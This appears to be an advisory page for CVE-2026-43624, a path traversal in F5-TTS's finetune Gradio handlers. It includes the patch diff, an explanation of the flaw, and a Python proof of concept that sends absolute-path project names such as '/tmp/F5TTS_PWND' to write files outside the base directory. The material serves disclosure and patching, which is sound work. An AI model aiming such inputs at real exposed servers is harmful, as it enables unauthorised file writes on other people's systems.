VYPR
High severity8.2NVD Advisory· Published Jun 1, 2026

CVE-2026-43624

CVE-2026-43624

Description

F5-TTS through version 1.1.20 contains a path traversal vulnerability in the finetune Gradio handlers that allows unauthenticated attackers to write arbitrary files by passing unsanitized user-supplied project names directly to os.path.join() without validating the resulting path stays within the intended base directory. Attackers can supply absolute path arguments such as /tmp/EVIL to override the base directory entirely and create arbitrary directories with attacker-controlled JSON content at any filesystem path writable by the server process.

Affected products

1

Patches

1
2f53ded68e5f

Merge pull request #1294 from AAtomical/fix/path-traversal-finetune-gradio

https://github.com/SWivid/F5-TTSYushen CHENMay 13, 2026via nvd-ref
1 file changed · +30 13
  • src/f5_tts/train/finetune_gradio.py+30 13 modified
    @@ -33,6 +33,22 @@
     from f5_tts.model.utils import convert_char_to_pinyin
     
     
    +def _safe_project_path(base: str, name: str) -> str:
    +    """Return the resolved absolute path of base/name, raising ValueError if name
    +    is absolute, contains a null byte, or resolves outside base."""
    +    if not name or os.path.isabs(name) or "\x00" in name:
    +        raise ValueError(f"invalid project_name: {name!r}")
    +    # Strip path separators and control characters to a plain filename component.
    +    name = re.sub(r"[/\\]", "", name).strip()
    +    if not name or name in (".", ".."):
    +        raise ValueError(f"invalid project_name: {name!r}")
    +    candidate = os.path.realpath(os.path.join(base, name))
    +    base_real = os.path.realpath(base)
    +    if not (candidate + os.sep).startswith(base_real + os.sep):
    +        raise ValueError(f"project_name escapes base directory: {name!r}")
    +    return candidate
    +
    +
     training_process = None
     system = platform.system()
     python_executable = sys.executable or "python"
    @@ -80,7 +96,7 @@ def save_settings(
         logger,
         ch_8bit_adam,
     ):
    -    path_project = os.path.join(path_project_ckpts, project_name)
    +    path_project = _safe_project_path(path_project_ckpts, project_name)
         os.makedirs(path_project, exist_ok=True)
         file_setting = os.path.join(path_project, "setting.json")
     
    @@ -113,7 +129,7 @@ def save_settings(
     # Load settings from a JSON file
     def load_settings(project_name):
         project_name = project_name.replace("_pinyin", "").replace("_char", "")
    -    path_project = os.path.join(path_project_ckpts, project_name)
    +    path_project = _safe_project_path(path_project_ckpts, project_name)
         file_setting = os.path.join(path_project, "setting.json")
     
         # Default settings
    @@ -356,7 +372,7 @@ def start_training(
             torch.cuda.empty_cache()
             tts_api = None
     
    -    path_project = os.path.join(path_data, dataset_name)
    +    path_project = _safe_project_path(path_data, dataset_name)
     
         if not os.path.isdir(path_project):
             yield (
    @@ -610,14 +626,15 @@ def get_list_projects():
     
     def create_data_project(name, tokenizer_type):
         name += "_" + tokenizer_type
    -    os.makedirs(os.path.join(path_data, name), exist_ok=True)
    -    os.makedirs(os.path.join(path_data, name, "dataset"), exist_ok=True)
    +    project_dir = _safe_project_path(path_data, name)
    +    os.makedirs(project_dir, exist_ok=True)
    +    os.makedirs(os.path.join(project_dir, "dataset"), exist_ok=True)
         project_list, projects_selelect = get_list_projects()
         return gr.update(choices=project_list, value=name)
     
     
     def transcribe_all(name_project, audio_files, language, user=False, progress=gr.Progress()):
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         path_dataset = os.path.join(path_project, "dataset")
         path_project_wavs = os.path.join(path_project, "wavs")
         file_metadata = os.path.join(path_project, "metadata.csv")
    @@ -726,7 +743,7 @@ def has_supported_extension(file_name):
     
     
     def create_metadata(name_project, ch_tokenizer, progress=gr.Progress()):
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         path_project_wavs = os.path.join(path_project, "wavs")
         file_metadata = os.path.join(path_project, "metadata.csv")
         file_raw = os.path.join(path_project, "raw.arrow")
    @@ -850,7 +867,7 @@ def calculate_train(
         num_warmup_updates,
         finetune,
     ):
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         file_duration = os.path.join(path_project, "duration.json")
     
         hop_length = 256
    @@ -1003,7 +1020,7 @@ def vocab_extend(project_name, symbols, model_type):
             return "Symbols empty!"
     
         name_project = project_name
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         file_vocab_project = os.path.join(path_project, "vocab.txt")
     
         file_vocab = os.path.join(path_data, "Emilia_ZH_EN_pinyin/vocab.txt")
    @@ -1049,7 +1066,7 @@ def vocab_extend(project_name, symbols, model_type):
         vocab_size_new = len(miss_symbols)
     
         dataset_name = name_project.replace("_pinyin", "").replace("_char", "")
    -    new_ckpt_path = os.path.join(path_project_ckpts, dataset_name)
    +    new_ckpt_path = _safe_project_path(path_project_ckpts, dataset_name)
         os.makedirs(new_ckpt_path, exist_ok=True)
     
         # Add pretrained_ prefix to model when copying for consistency with finetune_cli.py
    @@ -1063,7 +1080,7 @@ def vocab_extend(project_name, symbols, model_type):
     
     def vocab_check(project_name, tokenizer_type):
         name_project = project_name
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
     
         file_metadata = os.path.join(path_project, "metadata.csv")
     
    @@ -1110,7 +1127,7 @@ def vocab_check(project_name, tokenizer_type):
     
     def get_random_sample_prepare(project_name):
         name_project = project_name
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         file_arrow = os.path.join(path_project, "raw.arrow")
         if not os.path.isfile(file_arrow):
             return "", None
    @@ -1123,7 +1140,7 @@ def get_random_sample_prepare(project_name):
     
     def get_random_sample_transcribe(project_name):
         name_project = project_name
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         file_metadata = os.path.join(path_project, "metadata.csv")
         if not os.path.isfile(file_metadata):
             return "", None
    

Vulnerability mechanics

Root cause

"The finetune Gradio handlers in F5-TTS improperly handle user-supplied project names, allowing path traversal."

Attack vector

Unauthenticated attackers can exploit this vulnerability by interacting with the Gradio interface. By providing absolute paths or path traversal sequences as the project name to functions like `create_data_project` or `save_settings`, attackers can bypass intended directory restrictions. The `os.path.join()` function, when given an absolute path as the second argument, discards the base path, allowing arbitrary file writes and directory creation at any location writable by the server process [ref_id=1].

Affected code

The vulnerability resides in the finetune Gradio handlers, specifically within the `create_data_project` and `save_settings` functions. The original implementation directly used `os.path.join(path_data, name)` and `os.path.join(path_project_ckpts, project_name)` without proper validation of the `name` or `project_name` inputs [ref_id=1, ref_id=2].

What the fix does

The patch introduces a new function, `_safe_project_path`, which is used to sanitize project names before they are used to construct file paths. This function validates that the provided name is not absolute, does not contain null bytes, and that the resolved path remains within the specified base directory. Any input that fails these checks will raise a ValueError, preventing the path traversal and arbitrary file write [ref_id=2].

Preconditions

  • networkThe Gradio server must be accessible over the network.
  • authNo authentication is required to access the vulnerable Gradio handlers.
  • inputThe attacker must be able to supply a crafted project name, such as an absolute path or a path traversal sequence.

Reproduction

```python from __future__ import annotations

import json import os import shutil import sys import threading import time from pathlib import Path

# REAL upstream import — installed via `pip install f5-tts==1.1.20`. import gradio as gr from gradio_client import Client from f5_tts.train import finetune_gradio # the vulnerable module assert ( finetune_gradio.create_data_project.__module__ == "f5_tts.train.finetune_gradio" ), "create_data_project must come from upstream module, not a local shim" assert ( finetune_gradio.save_settings.__module__ == "f5_tts.train.finetune_gradio" ), "save_settings must come from upstream module, not a local shim"

def build_app() -> gr.Blocks: with gr.Blocks() as app: project_name_in = gr.Textbox(label="Project Name", value="my_speak") cm_project = gr.Dropdown( choices=["my_speak_pinyin", "my_speak_char"], value="my_speak_pinyin", label="Project", allow_custom_value=True, ) tokenizer_type = gr.Radio(choices=["pinyin", "char"], value="pinyin", label="Tokenizer") bt_create = gr.Button("Create a New Project") bt_save = gr.Button("Save Settings") out_create = gr.Textbox(label="create_data_project output", interactive=False) out_save = gr.Textbox(label="save_settings output", interactive=False)

# --- Sink 1: create_data_project (line 611-614) --- bt_create.click( fn=finetune_gradio.create_data_project, inputs=[project_name_in, tokenizer_type], outputs=[cm_project], api_name="create_data_project", )

# --- Sink 2: save_settings (line 61-110) --- # save_settings has 20 args; we provide harmless defaults for the # non-path ones. Only project_name (cm_project) is the attack vector. def call_save_settings(project_name: str, tokenizer_type: str): return finetune_gradio.save_settings( project_name, # <-- ATTACKER CONTROLLED "TestExp", # exp_name 1e-5, # learning_rate 3200, # batch_size_per_gpu "frame", # batch_size_type 64, # max_samples 1, # grad_accumulation_steps 1.0, # max_grad_norm 10, # epochs 100, # num_warmup_updates 100, # save_per_updates 3, # keep_last_n_checkpoints 10, # last_per_updates True, # finetune "", # file_checkpoint_train tokenizer_type, # tokenizer_type "", # tokenizer_file "fp16", # mixed_precision "none", # logger False, # ch_8bit_adam )

bt_save.click( fn=call_save_settings, inputs=[cm_project, tokenizer_type], outputs=[out_save], api_name="save_settings", )

return app

PORT = 7861 app = build_app() server_thread = threading.Thread( target=lambda: app.queue().launch( server_name="127.0.0.1", server_port=PORT, share=False, prevent_thread_lock=True, quiet=True, ), daemon=True, ) print(f"[+] launching real Gradio server on 127.0.0.1:{PORT} ...") server_thread.start()

# Wait for server readiness — poll the /info endpoint import urllib.request import urllib.error

deadline = time.time() + 30 ready = False while time.time() < deadline: try: urllib.request.urlopen(f"http://127.0.0.1:{PORT}/", timeout=1) ready = True break except (urllib.error.URLError, ConnectionRefusedError): time.sleep(0.5) if not ready: raise RuntimeError("Gradio server did not come up within 30s") print("[+] server is up, connecting via gradio_client (real HTTP+WS RPC)")

client = Client(f"http://127.0.0.1:{PORT}/", verbose=False) print("[+] connected via gradio_client")

# --- PoC Configuration --- ATTACK_PROJECT_NAME = "/tmp/F5TTS_PWND" ATTACK_TOKENIZER = "pinyin"

# Define expected paths for verification # These are derived from the PoC's logic and filesystem results base_data = Path("venv/lib/python3.11/data") # Example base, actual may vary base_ckpts = Path("venv/lib/python3.11/ckpts") # Example base, actual may vary

# The PoC expects a directory like /tmp/F5TTS_PWND_pinyin/ expected_dataset_subdir = Path(f"{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}/dataset") # The PoC expects a file like /tmp/F5TTS_PWND_pinyin/setting.json expected_setting_file = Path(f"{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}/setting.json")

# Ensure cleanup of previous runs if any if expected_dataset_subdir.exists(): shutil.rmtree(expected_dataset_subdir) if expected_setting_file.exists(): os.remove(expected_setting_file)

# Create parent directory for the escaped file if it doesn't exist # This is necessary because the vulnerability allows creating arbitrary directories # and the PoC might be run in an environment where /tmp/F5TTS_PWND doesn't exist yet. # The PoC's `create_data_project` call will create the _pinyin subdirectory. os.makedirs(ATTACK_PROJECT_NAME, exist_ok=True)

print(f"\n[+] Attack 1: create_data_project name='{ATTACK_PROJECT_NAME}'") result1 = client.predict( ATTACK_PROJECT_NAME, ATTACK_TOKENIZER, api_name="/create_data_project", ) print(f" handler returned: {result1!r}")

print(f"\n[+] Attack 2: save_settings cm_project='{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}'") # save_settings receives cm_project verbatim (no concat, unlike create_data_project). # So we pre-form the same name shape produced by attack 1. result2 = client.predict( f"{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}", ATTACK_TOKENIZER, api_name="/save_settings", ) print(f" handler returned: {result2!r}")

# ──────────────────────────────────────────────────────────────────────────────── # Verify escape # ────────────────────────────────────────────────────────────────────────────────

print("\n[+] verifying filesystem state ...") escaped_artefacts = []

# Check if the escaped directory and file were created if expected_dataset_subdir.exists(): escaped_artefacts.append(str(expected_dataset_subdir)) if expected_setting_file.exists(): size = expected_setting_file.stat().st_size escaped_artefacts.append(f"{expected_setting_file} ({size} bytes)") print(f" {expected_setting_file} content (first 200 chars):") print(" " + expected_setting_file.read_text()[:200].replace("\n", "\n "))

if not escaped_artefacts: print("[FAIL] no escape — handler may have refused the input") sys.exit(1)

print("\n" + "=" * 72) print("[!] ESCAPE CONFIRMED — file/dir written OUTSIDE both bases:") print(f" base_data = {base_data}") print(f" base_project_ckpts = {base_ckpts}") for art in escaped_artefacts: art_path = Path(art.split(" (")[0]) # Check if the artifact path starts with either base_data or base_ckpts in_base = ( str(art_path).startswith(str(base_data) + os.sep) # type: ignore or str(art_path).startswith(str(base_ckpts) + os.sep) # type: ignore ) marker = "ESCAPE" if not in_base else "in-base" print(f" [{marker}] {art}") print("=" * 72) print("\n[+] artefacts left in place at /tmp/F5TTS_PWND_pinyin/ for manual inspection") print(" rm -rf /tmp/F5TTS_PWND_pinyin/ # to clean up") ```

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.